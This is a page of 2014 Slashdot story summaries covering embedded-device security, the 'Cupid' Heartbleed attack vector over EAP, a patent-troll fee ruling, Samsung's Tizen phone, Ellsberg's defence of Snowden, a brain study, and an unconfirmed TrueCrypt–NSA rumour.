By samzenpus from Slashdot's down-in-flames department
writes "Insecure by design and trusted by default, embedded systems present security concerns that could prove crippling if not addressed by fabricators, vendors, and customers alike, InfoWorld reports. Routers, smart refrigerators, in-pavement traffic-monitoring systems, or crop-monitoring drones — 'the trend toward systems and devices that, once deployed, stubbornly "keep on ticking" regardless of the wishes of those who deploy them is fast becoming an IT security nightmare made real, affecting everything from mom-and-pop shops to power stations. This unpatchable hell is a problem with many fathers, from recalcitrant vendors to customers wary of — or hostile to — change. But with the number and diversity of connected endpoints expected to skyrocket in the next decade, radical measures are fast becoming necessary to ensure that today's "smart" devices and embedded systems don't haunt us for years down the line.'"Read Replies (0)
By samzenpus from Slashdot's protect-ya-neck department
writes "While most organizations have patched the Heartbleed bug in their OpenSSL installations, a security expert has uncovered new vectors for exploiting the vulnerability, which can impact enterprise wireless networks, Android devices, and other connected devices. Dubbed 'Cupid,' the new attack method was recently presented by Portuguese security researcher Luis Grangeia, who debunked theories that Heartbleed could only be exploited over TCP connections, and after the TLS handshake. Unlike the initial Heartbleed attack, which took place on TLS connections over TCP, the Cupid attack happens on TLS connections over the Extensible Authentication Protocol (EAP), an authentication framework typically used in wireless networks and peer-to-peer connections.
The researcher has confirmed that default installations of wpa_supplicant, hostapd, and freeradius (RADIUS server implementation) can be exploited on Ubuntu if a vulnerable version of OpenSSL is utilized. Mobile devices running Android 4.1.0 and 4.1.1 also use wpa_supplicant to connect to wireless networks, so they're also affected. Everything that uses OpenSSL for EAP TLS is susceptible to Cupid attacks. While he hasn't been able to confirm it, the expert believes iPhones, iPads, OS X, other RADIUS servers besides freeradius, VoIP phones, printers, and various commercial managed wireless solutions could be affected."Read Replies (0)
By timothy from Slashdot's once-in-a-while-justice-peeks-through department
We mentioned last year that FindTheBest CEO Kevin O'Connor had taken an unusual step, when confronted with a demand by patent troll company Lumen View that the startup pay $50,000 for what struck O'Connor as a frivolous patent: He not only refused, but pledged to spend a million bucks, if necessary, to fight Lumen View in court
. Now, as Ars Technica reports, O'Connor has succeeded on a grand scale
. Before trouncing Lumen View in court, Ars reports, "FindTheBest had spent about $200,000 on its legal fight—not to mention the productivity lost in hundreds of work hours spent by top executives on the lawsuit, and three all-company meetings.
Now the judge overseeing the case has ruled (PDF) that it's Lumen View, not FindTheBest, that should have to pay those expenses. In a first-of-its-kind implementation of new fee-shifting rules mandated by the Supreme Court, US District Judge Denise Cote found that the Lumen View lawsuit was a 'prototypical exceptional case.'"Read Replies (0)
By timothy from Slashdot's complicated-model department
As The Next Web reports, Samsung is finally bringing to market (in Russia, to start)
a phone, the Samzung Z, running the Tizen
OS. Like Android, Tizen is based on the Linux kernel, but it's intended for HTML5 apps rather than Android apps. It's not Samsung's first Tizen device
, though; the second-generation of its Gear smart-watches are running Tizen as well. "Samsung earlier revealed plans for its first Tizen smartphones to be launched during its second quarter of business in 2014, which runs April to July, so it seems like smartphones other than Samsung Z could still be on their way. The Samsung executive said that Tizen devices could account for as much as 15 percent of Samsung’s mobile shipments per year, but Android will still be its main business."Read Replies (0)
By timothy from Slashdot's where-liddy-was-wrong department
, no slouch himself in bringing to public awareness documents that reveal uncomfortable facts about government operations
, says that "Edward Snowden is the greatest patriot whistleblower of our time." Ellsberg says, in an editorial at The Guardian pointed out by reader ABEND (15913)
, that Snowden cannot receive a fair trial
without reform of the Espionage Act. According to Ellsberg, "Snowden would come back home to a jail cell – and not just an ordinary cell-block but isolation in solitary confinement, not just for months like Chelsea Manning but for the rest of his sentence, and probably the rest of his life. His legal adviser, Ben Wizner, told me that he estimates Snowden's chance of being allowed out on bail as zero. (I was out on bond, speaking against the Vietnam war, the whole 23 months I was under indictment). More importantly, the current state of whistleblowing prosecutions under the Espionage Act makes a truly fair trial wholly unavailable to an American who has exposed classified wrongdoing. Legal scholars have strongly argued that the US supreme court – which has never yet addressed the constitutionality of applying the Espionage Act to leaks to the American public – should find the use of it overbroad and unconstitutional in the absence of a public interest defense. The Espionage Act, as applied to whistleblowers, violates the First Amendment, is what they're saying. As I know from my own case, even Snowden's own testimony on the stand would be gagged by government objections and the (arguably unconstitutional) nature of his charges. That was my own experience in court, as the first American to be prosecuted under the Espionage Act – or any other statute – for giving information to the American people."
Ellsberg rejects the distinction made by John Kerry in praising Ellsberg's own whistleblowing as patriotic, but Snowden's as cowardly and traitorous.Read Replies (0)
By timothy from Slashdot's news-for-nerds department
New submitter Bodhammer (559311)
writes "German researchers looked at the brains of 64 men between the ages of 21 and 45 and found that one brain region (the striatum, linked to reward processing), was smaller in the brains of porn watchers, and that a specific part of the same region is also less activated when exposed to more pornography."
While it's tempting to cast blame, "the study doesn't confirm whether watching porn causes the changes, or whether people with a certain brain type are inherently more apt to tune into X-rated content." The study's abstract is available
; the paper itself is pay-walled.Read Replies (0)
By timothy from Slashdot's maybe-your-canary-needs-a-canary department
writes "I use Truecrypt, but recently someone pointed me to the SourceForge page of Truecrypt that says it's out of business. I found the message weird, but now there's an explanation: Truecrypt has received a letter from the NSA."
Anyone with a firmer source (or who can debunk the claim), please chime in below; considering the fate of LavaBit
, it sure sounds plausible. PCWorld lists some alternative software
, for Windows users in particular, but do you believe that Microsoft's BitLocker is more secure?Read Replies (0)